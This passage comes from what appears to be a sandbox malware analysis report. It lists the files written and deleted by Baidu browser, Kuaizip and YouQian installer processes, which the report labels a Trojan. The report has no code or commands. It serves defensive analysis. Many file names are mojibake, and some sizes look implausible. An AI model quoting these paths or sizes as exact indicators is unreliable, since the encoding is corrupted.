%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Protocol.dll (12024 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Base.dll (38904 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\363.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\AppHTMLXinWen.xml (442 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\BDMSkin.dll (30464 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2617 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\BDWebDownload.dll (7192 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download.png (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\msvcr100.dll (25824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Utils.dll (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\msvcp100.dll (14184 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1216 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\InstallHelper.dll (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\YouQian_Setup.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.ini (1607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (284894 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\process.cfg (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\132.exe (172202 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)

The process Kuaizip_Setup_7654_1061607.exe:828 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\data\slimdata.dat (784 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ErrorMsg.xml (196 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\readme.txt (1 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZReport.exe (5232 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Uninst.exe (8122 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\7zNew.dat (32 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\SetupHelper.exe (667 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Update.exe (393 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\sfx\kzSetup_chs.sfx (3557 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\SLDefault.xml (196 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZModule.dll (6582 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZipShell.dll (981 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ali\kzshop.ico (1686 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe (2890 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹.lnk (661 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZFormat.dll (2028 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\BSCoreNew.dll (4135 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Mount.dll (1490 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\finderlib.dll (314 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\kuaizipUpdateChecker.dll (981 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\KzNew.dat (74 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ZipNew.dat (22 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\MountCore.dll (863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (30622 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\__-________.URL (49 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KuaiZip.exe (9092 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\DiskOpt.exe (4605 bytes)
%Documents and Settings%\%current user%\Start Menu\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹.lnk (661 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\DuiLib.dll (4605 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ali\jp.png (392 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\lang\Chs_Lang.dll (824 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (0 bytes)

The process YouQian_Setup.exe:1312 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)

The process Baidu.exe:1412 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\ÃƒÂ¥Ã‚ÂÃ‚Â¸ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)

The process Baidu.exe:1988 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130929942969960000.dat (95 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\Upd.dat (23 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
